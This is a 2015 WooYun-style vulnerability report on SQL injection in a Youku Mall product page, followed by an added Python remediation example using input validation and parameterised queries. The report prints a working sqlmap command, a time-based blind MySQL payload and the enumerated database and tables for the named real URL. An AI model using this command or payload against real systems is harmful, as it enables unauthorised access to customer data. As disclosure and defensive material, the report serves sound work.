
SQL injection vulnerability in Youku Mall allows reading the database

2015-10-21 01:10

The Youku Tudou Luyoubao (路由宝) router product page on Youku Mall has a SQL injection vulnerability.

URL: http://mall.youku.com/itemdetail/item/itemDetail.action?itemId=6589701773214092189

Tested with sqlmap:

Code area
sqlmap.py -u "http://mall.youku.com/itemdetail/item/itemDetail.action?itemId=6589701773214092189" --random-agent --time-sec 2 -D mall --tables

Proof of vulnerability:

Code area
Parameter: itemId (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: itemId=6589701773214092189) AND (SELECT * FROM (SELECT(SLEEP(5)))jmNX) AND (9905=9905
---
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] information_schema
[*] mall

Code area
Database: mall
[14 tables]
+----------------------------------+
| MALL_AREA_INFO |
| MALL_BUYER_ADDRESS |
| MALL_BUYER_CORE |
| MALL_BUYER_DETAIL |
| MALL_BUYER_STATUS |
| MALL_BUYER_WULIU |
| MALL_CATEGORY_CORE |
| MALL_CATEGORY_DETAIL |
| MALL_CATEGORY_STATUS |
| MALL_CENTER_AUTHORIZATION_DEFINE |
| MALL_CENTER_CHANNEL_CONFIG |
| MALL_CENTER_COMMON_OPERATE_LOG |
| MALL_CENTER_FUNCTION |
| MALL_CENTER_aRE |
+----------------------------------+

Remediation:

Add input filtering.
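
One way to implement the filtering called for above, as an added example that is not part of the original report: accept itemId only when it is a plain decimal id, then pass it to the database as a bound parameter instead of concatenating it into the statement. The table and column names are hypothetical, sqlite3 stands in for the MySQL back end, and the signed 64-bit upper bound is an assumption.

```python
import re
import sqlite3

# Constructed sample data; table and column names are hypothetical.
ITEM_ID = "6589701773214092189"
# Payload shape reported by sqlmap on this page: it closes a parenthesis
# and appends its own condition to the WHERE clause.
PAGE_PAYLOAD = ("6589701773214092189) AND (SELECT * FROM "
                "(SELECT(SLEEP(5)))jmNX) AND (9905=9905")

ID_RE = re.compile(r"[0-9]{1,19}")  # ASCII digits only, bounded length
MAX_ID = 2**63 - 1                  # assumption: signed 64-bit key column


def parse_item_id(raw):
    """Return itemId as an int, or None when it is not a plain decimal id."""
    if not isinstance(raw, str) or not ID_RE.fullmatch(raw):
        return None
    value = int(raw)
    return value if value <= MAX_ID else None


def make_db():
    """In-memory stand-in for the item table (constructed for this example)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE item (item_id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO item VALUES (?, ?)", (int(ITEM_ID), "router"))
    return db


def build_concatenated_sql(raw):
    """The 'before' pattern: request text becomes part of the SQL statement."""
    return "SELECT name FROM item WHERE (item_id = " + raw + ")"


def lookup_item(db, raw):
    """Hardened lookup: allow-list validation first, then a bound parameter."""
    item_id = parse_item_id(raw)
    if item_id is None:
        return None  # rejected before any SQL is executed
    row = db.execute(
        "SELECT name FROM item WHERE (item_id = ?)", (item_id,)
    ).fetchone()
    return row[0] if row else None
```

The bound parameter is the control that removes the injection; the allow-list check additionally lets the application reject and log malformed ids before they reach the database.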

Source: www.wooyun.org/bugs/wooyun-2015-0139116
